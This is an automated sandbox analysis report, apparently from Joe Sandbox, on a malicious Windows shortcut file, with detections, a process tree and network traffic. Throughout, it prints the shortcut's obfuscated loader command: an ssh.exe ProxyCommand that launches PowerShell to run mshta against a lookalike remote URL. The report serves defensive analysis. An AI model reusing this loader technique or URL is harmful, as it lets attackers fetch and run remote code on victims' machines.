Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
IOnqEVA4Dz.lnk

Overview

General Information

Sample name:IOnqEVA4Dz.lnk
renamed because original name is a hash value
Original sample name:c5997a14e872d97d48e1d4ea8b66910f.lnk
Analysis ID:1582822
MD5:c5997a14e872d97d48e1d4ea8b66910f
SHA1:e5bc26705b9df5eadfc65ff0bb600743b4d2894d
SHA256:1e31450855498aa18f97e2bd1b77aa3cf652b88271502ca7ee926938c04b722f
Tags:lnkuser-abuse_ch
Infos:

Detection

Score:76
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Windows shortcut file (LNK) starts blacklisted processes
AI detected suspicious sample
Sigma detected: Potentially Suspicious PowerShell Child Processes
Windows shortcut file (LNK) contains suspicious command line arguments
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Sigma detected: Lolbin Ssh.exe Use As Proxy
Uses a known web browser user agent for HTTP communication
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Process Tree

  • System is w10x64
  • ssh.exe (PID: 7096 cmdline: "C:\Windows\System32\OpenSSH\ssh.exe" -o ProxyCommand="powershell powershell -Command 'UqtSm[`6fHA6[bo=yymshta https://awakka-aws3.zoho-documents.com/hekko.mp4UqtSm[`6fHA6[bo=yy'.SubString(18, 54)" . MD5: C05426E6F6DFB30FB78FBA874A2FF7DC)
    • conhost.exe (PID: 6528 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 1476 cmdline: powershell powershell -Command 'UqtSm[`6fHA6[bo=yymshta https://awakka-aws3.zoho-documents.com/hekko.mp4UqtSm[`6fHA6[bo=yy'.SubString(18, 54) MD5: 04029E121A0CFA5991749937DD22A1D9)
      • powershell.exe (PID: 5520 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "mshta https://awakka-aws3.zoho-documents.com/hekko.mp4" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • mshta.exe (PID: 6464 cmdline: "C:\Windows\system32\mshta.exe" https://awakka-aws3.zoho-documents.com/hekko.mp4 MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
  • svchost.exe (PID: 6424 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

System Summary

barindex
Sigma detected: Potentially Suspicious PowerShell Child Processes
Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\system32\mshta.exe" https://awakka-aws3.zoho-documents.com/hekko.mp4, CommandLine: "C:\Windows\system32\mshta.exe" https://awakka-aws3.zoho-documents.com/hekko.mp4, CommandLine|base64offset|contains: , Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "mshta https://awakka-aws3.zoho-documents.com/hekko.mp4", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 5520, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\system32\mshta.exe" https://awakka-aws3.zoho-documents.com/hekko.mp4, ProcessId: 6464, ProcessName: mshta.exe
Sigma detected: Lolbin Ssh.exe Use As Proxy
Source: Process startedAuthor: frack113, Nasreddine Bencherchali: Data: Command: "C:\Windows\System32\OpenSSH\ssh.exe" -o ProxyCommand="powershell powershell -Command 'UqtSm[`6fHA6[bo=yymshta https://awakka-aws3.zoho-documents.com/hekko.mp4UqtSm[`6fHA6[bo=yy'.SubString(18, 54)" ., CommandLine: "C:\Windows\System32\OpenSSH\ssh.exe" -o ProxyCommand="powershell powershell -Command 'UqtSm[`6fHA6[bo=yymshta https://awakka-aws3.zoho-documents.com/hekko.mp4UqtSm[`6fHA6[bo=yy'.SubString(18, 54)" ., CommandLine|base64offset|contains: , Image: C:\Windows\System32\OpenSSH\ssh.exe, NewProcessName: C:\Windows\System32\OpenSSH\ssh.exe, OriginalFileName: C:\Windows\System32\OpenSSH\ssh.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\OpenSSH\ssh.exe" -o ProxyCommand="powershell powershell -Command 'UqtSm[`6fHA6[bo=yymshta https://awakka-aws3.zoho-documents.com/hekko.mp4UqtSm[`6fHA6[bo=yy'.SubString(18, 54)" ., ProcessId: 7096, ProcessName: ssh.exe
Sigma detected: Non Interactive PowerShell Process Spawned
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell powershell -Command 'UqtSm[`6fHA6[bo=yymshta https://awakka-aws3.zoho-documents.com/hekko.mp4UqtSm[`6fHA6[bo=yy'.SubString(18, 54), CommandLine: powershell powershell -Command 'UqtSm[`6fHA6[bo=yymshta https://awakka-aws3.zoho-documents.com/hekko.mp4UqtSm[`6fHA6[bo=yy'.SubString(18, 54), CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\OpenSSH\ssh.exe" -o ProxyCommand="powershell powershell -Command 'UqtSm[`6fHA6[bo=yymshta https://awakka-aws3.zoho-documents.com/hekko.mp4UqtSm[`6fHA6[bo=yy'.SubString(18, 54)" ., ParentImage: C:\Windows\System32\OpenSSH\ssh.exe, ParentProcessId: 7096, ParentProcessName: ssh.exe, ProcessCommandLine: powershell powershell -Command 'UqtSm[`6fHA6[bo=yymshta https://awakka-aws3.zoho-documents.com/hekko.mp4UqtSm[`6fHA6[bo=yy'.SubString(18, 54), ProcessId: 1476, ProcessName: powershell.exe
Sigma detected: Windows Processes Suspicious Parent Directory
Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 6424, ProcessName: svchost.exe

Suricata Signatures

No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Antivirus detection for URL or domain
Source: https://awakka-aws3.zoho-documents.com/hekko.mp4Avira URL Cloud: Label: malware
Multi AV Scanner detection for submitted file
Source: IOnqEVA4Dz.lnkVirustotal: Detection: 36%Perma Link
Source: IOnqEVA4Dz.lnkReversingLabs: Detection: 34%
AI detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 95.8% probability
Source: unknownHTTPS traffic detected: 172.67.129.82:443 -> 192.168.2.5:49723 version: TLS 1.2
Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: global trafficHTTP traffic detected: GET /hekko.mp4 HTTP/1.1Accept: */*Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: awakka-aws3.zoho-documents.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /cdn-cgi/styles/cf.errors.css HTTP/1.1Accept: */*Referer: https://awakka-aws3.zoho-documents.com/hekko.mp4Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: awakka-aws3.zoho-documents.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /cdn-cgi/images/icon-exclamation.png?1376755637 HTTP/1.1Accept: */*Referer: https://awakka-aws3.zoho-documents.com/hekko.mp4Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: awakka-aws3.zoho-documents.comConnection: Keep-Alive
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /hekko.mp4 HTTP/1.1Accept: */*Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: awakka-aws3.zoho-documents.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /cdn-cgi/styles/cf.errors.css HTTP/1.1Accept: */*Referer: https://awakka-aws3.zoho-documents.com/hekko.mp4Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: awakka-aws3.zoho-documents.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /cdn-cgi/images/icon-exclamation.png?1376755637 HTTP/1.1Accept: */*Referer: https://awakka-aws3.zoho-documents.com/hekko.mp4Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: awakka-aws3.zoho-documents.comConnection: Keep-Alive
Source: global trafficDNS traffic detected: DNS query: awakka-aws3.zoho-documents.com
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Tue, 31 Dec 2024 14:41:47 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: SAMEORIGINServer: cloudflareCF-RAY: 8fab084decec41f2-EWRalt-svc: h3=":443"; ma=86400
Source: svchost.exe, 00000006.00000002.3566515266.0000021AFF200000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
Source: qmgr.db.6.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: qmgr.db.6.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: qmgr.db.6.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: qmgr.db.6.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: qmgr.db.6.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: qmgr.db.6.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: edb.log.6.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: powershell.exe, 00000004.00000002.2345137749.0000029200031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000004.00000002.2345137749.0000029200049000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2345137749.000002920005C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
Source: mshta.exe, 00000005.00000002.3564144751.000001B5C0FB8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://awakka-aws3.zoho-documents.com/
Source: mshta.exe, 00000005.00000002.3566486432.000001BDC3AA9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.3566486432.000001BDC3A99000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://awakka-aws3.zoho-documents.com/cdn-cgi/images/icon-exclamation.png?1376755637
Source: mshta.exe, 00000005.00000002.3566486432.000001BDC3A99000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://awakka-aws3.zoho-documents.com/cdn-cgi/images/icon-exclamation.png?1376755637)
Source: mshta.exe, 00000005.00000002.3566486432.000001BDC3A00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://awakka-aws3.zoho-documents.com/cdn-cgi/images/icon-exclamation.png?1376755637...
Source: mshta.exe, 00000005.00000002.3566486432.000001BDC3A00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://awakka-aws3.zoho-documents.com/cdn-cgi/images/icon-exclamation.png?1376755637...0
Source: mshta.exe, 00000005.00000002.3566486432.000001BDC3A00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://awakka-aws3.zoho-documents.com/cdn-cgi/images/icon-exclamation.png?1376755637...p
Source: mshta.exe, 00000005.00000002.3566486432.000001BDC3A00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://awakka-aws3.zoho-documents.com/cdn-cgi/images/icon-exclamation.png?1376755637...ust
Source: mshta.exe, 00000005.00000002.3566486432.000001BDC3A00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://awakka-aws3.zoho-documents.com/cdn-cgi/images/icon-exclamation.png?13767556376.1
Source: mshta.exe, 00000005.00000002.3566486432.000001BDC3A99000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://awakka-aws3.zoho-documents.com/cdn-cgi/images/icon-exclamation.png?1376755637=
Source: mshta.exe, 00000005.00000002.3566486432.000001BDC3A99000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://awakka-aws3.zoho-documents.com/cdn-cgi/images/icon-exclamation.png?1376755637A
Source: mshta.exe, 00000005.00000002.3566486432.000001BDC3A99000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://awakka-aws3.zoho-documents.com/cdn-cgi/images/icon-exclamation.png?1376755637a
Source: mshta.exe, 00000005.00000002.3566486432.000001BDC3A99000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://awakka-aws3.zoho-documents.com/cdn-cgi/images/icon-exclamation.png?1376755637i
Source: mshta.exe, 00000005.00000002.3566486432.000001BDC3A99000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://awakka-aws3.zoho-documents.com/cdn-cgi/images/icon-exclamation.png?1376755637m
Source: mshta.exe, 00000005.00000002.3566486432.000001BDC3A00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://awakka-aws3.zoho-documents.com/cdn-cgi/images/icon-exclamation.png?1376755637n
Source: mshta.exe, 00000005.00000002.3566486432.000001BDC3A99000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://awakka-aws3.zoho-documents.com/cdn-cgi/images/icon-exclamation.png?1376755637q
Source: mshta.exe, 00000005.00000002.3564144751.000001B5C0FD7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://awakka-aws3.zoho-documents.com/cdn-cgi/phish-bypass
Source: mshta.exe, 00000005.00000002.3564144751.000001B5C0FD7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://awakka-aws3.zoho-documents.com/cdn-cgi/phish-bypassk
Source: mshta.exe, 00000005.00000002.3566486432.000001BDC3A00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://awakka-aws3.zoho-documents.com/cdn-cgi/styles/cf.errors.css
Source: mshta.exe, 00000005.00000002.3566486432.000001BDC3A00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://awakka-aws3.zoho-documents.com/cdn-cgi/styles/cf.errors.css:
Source: mshta.exe, 00000005.00000002.3566486432.000001BDC3A00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://awakka-aws3.zoho-documents.com/cdn-cgi/styles/cf.errors.cssD
Source: mshta.exe, 00000005.00000002.3566486432.000001BDC3A00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://awakka-aws3.zoho-documents.com/cdn-cgi/styles/cf.errors.css_
Source: mshta.exe, 00000005.00000002.3564144751.000001B5C0F3D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://awakka-aws3.zoho-documents.com/cdn-cgi/styles/cf.errors.cssnt
Source: mshta.exe, 00000005.00000002.3566486432.000001BDC3A6B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.3566486432.000001BDC3A00000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.3564144751.000001B5C0F00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://awakka-aws3.zoho-documents.com/hekko.mp4
Source: powershell.exeString found in binary or memory: https://awakka-aws3.zoho-documents.com/hekko.mp4$global:?
Source: mshta.exe, 00000005.00000002.3566486432.000001BDC3A00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://awakka-aws3.zoho-documents.com/hekko.mp42
Source: mshta.exe, 00000005.00000002.3564144751.000001B5C0F00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://awakka-aws3.zoho-documents.com/hekko.mp4C:
Source: mshta.exe, 00000005.00000002.3563920706.000001B5C0EC0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://awakka-aws3.zoho-documents.com/hekko.mp4H
Source: powershell.exe, 00000004.00000002.2347693599.000002927C5E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://awakka-aws3.zoho-documents.com/hekko.mp4L
Source: powershell.exe, 00000004.00000002.2345137749.000002920014C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2345137749.00000292003A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://awakka-aws3.zoho-documents.com/hekko.mp4P
Source: mshta.exe, 00000005.00000002.3564144751.000001B5C0F3D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://awakka-aws3.zoho-documents.com/hekko.mp4Pgs
Source: ssh.exe, 00000000.00000002.3563617247.00000229B4079000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, IOnqEVA4Dz.lnkString found in binary or memory: https://awakka-aws3.zoho-documents.com/hekko.mp4UqtSm
Source: mshta.exe, 00000005.00000002.3564144751.000001B5C0F3D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://awakka-aws3.zoho-documents.com/hekko.mp4Ygs
Source: powershell.exe, 00000004.00000002.2348868362.000002927E6D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://awakka-aws3.zoho-documents.com/hekko.mp4_
Source: mshta.exe, 00000005.00000002.3567740148.000001BDC3C15000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://awakka-aws3.zoho-documents.com/hekko.mp4https://awakka-aws3.zoho-documents.com/hekko.mp4p7
Source: mshta.exe, 00000005.00000002.3564064373.000001B5C0EF0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://awakka-aws3.zoho-documents.com/hekko.mp4i
Source: powershell.exe, 00000004.00000002.2348447690.000002927C7B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://awakka-aws3.zoho-documents.com/hekko.mp4m32
Source: powershell.exe, 00000004.00000002.2345137749.0000029200001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://awakka-aws3.zoho-documents.com/hekko.mp4p
Source: mshta.exe, 00000005.00000002.3566486432.000001BDC3A00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://awakka-aws3.zoho-documents.com/hekko.mp4yles/cf.errors.css
Source: edb.log.6.drString found in binary or memory: https://g.live.com/odclientsettings/Prod/C:
Source: svchost.exe, 00000006.00000003.2366242998.0000021AFF090000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.6.dr, edb.log.6.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
Source: mshta.exe, 00000005.00000002.3564144751.000001B5C0FB0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
Source: qmgr.db.6.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe/C:
Source: mshta.exe, 00000005.00000002.3564144751.000001B5C0FD7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/5xx-eraryer
Source: mshta.exe, 00000005.00000002.3566486432.000001BDC3A6B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.3566486432.000001BDC3A00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/5xx-error-landing
Source: mshta.exe, 00000005.00000002.3564144751.000001B5C0FB8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/5xx-error-landingnagement/phishing-attack/
Source: mshta.exe, 00000005.00000002.3566486432.000001BDC3A00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/learning/access-management/phishing-attack/
Source: mshta.exe, 00000005.00000002.3568334539.000001BDC7F62000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/learning/access-management/phishing-attack/D
Source: mshta.exe, 00000005.00000002.3566486432.000001BDC3A00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/learning/access-management/phishing-attack/MX
Source: mshta.exe, 00000005.00000002.3568334539.000001BDC7F62000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/learning/access-management/phishing-attack/v
Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
Source: unknownHTTPS traffic detected: 172.67.129.82:443 -> 192.168.2.5:49723 version: TLS 1.2

System Summary

barindex
Windows shortcut file (LNK) contains suspicious command line arguments
Source: IOnqEVA4Dz.lnkLNK file: -o ProxyCommand="powershell powershell -Command 'UqtSm[`6fHA6[bo=yymshta https://awakka-aws3.zoho-documents.com/hekko.mp4UqtSm[`6fHA6[bo=yy'.SubString(18, 54)" .
Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
Source: classification engineClassification label: mal76.winLNK@9/11@1/2
Source: C:\Windows\System32\OpenSSH\ssh.exeFile created: C:\Users\user\.sshJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gnevcnja.2vz.ps1Jump to behavior
Source: C:\Windows\System32\conhost.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: IOnqEVA4Dz.lnkVirustotal: Detection: 36%
Source: IOnqEVA4Dz.lnkReversingLabs: Detection: 34%
Source: unknownProcess created: C:\Windows\System32\OpenSSH\ssh.exe "C:\Windows\System32\OpenSSH\ssh.exe" -o ProxyCommand="powershell powershell -Command 'UqtSm[`6fHA6[bo=yymshta https://awakka-aws3.zoho-documents.com/hekko.mp4UqtSm[`6fHA6[bo=yy'.SubString(18, 54)" .
Source: C:\Windows\System32\OpenSSH\ssh.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\OpenSSH\ssh.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell powershell -Command 'UqtSm[`6fHA6[bo=yymshta https://awakka-aws3.zoho-documents.com/hekko.mp4UqtSm[`6fHA6[bo=yy'.SubString(18, 54)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "mshta https://awakka-aws3.zoho-documents.com/hekko.mp4"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" https://awakka-aws3.zoho-documents.com/hekko.mp4
Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Windows\System32\OpenSSH\ssh.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell powershell -Command 'UqtSm[`6fHA6[bo=yymshta https://awakka-aws3.zoho-documents.com/hekko.mp4UqtSm[`6fHA6[bo=yy'.SubString(18, 54)Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "mshta https://awakka-aws3.zoho-documents.com/hekko.mp4"Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" https://awakka-aws3.zoho-documents.com/hekko.mp4Jump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: libcrypto.dllJump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
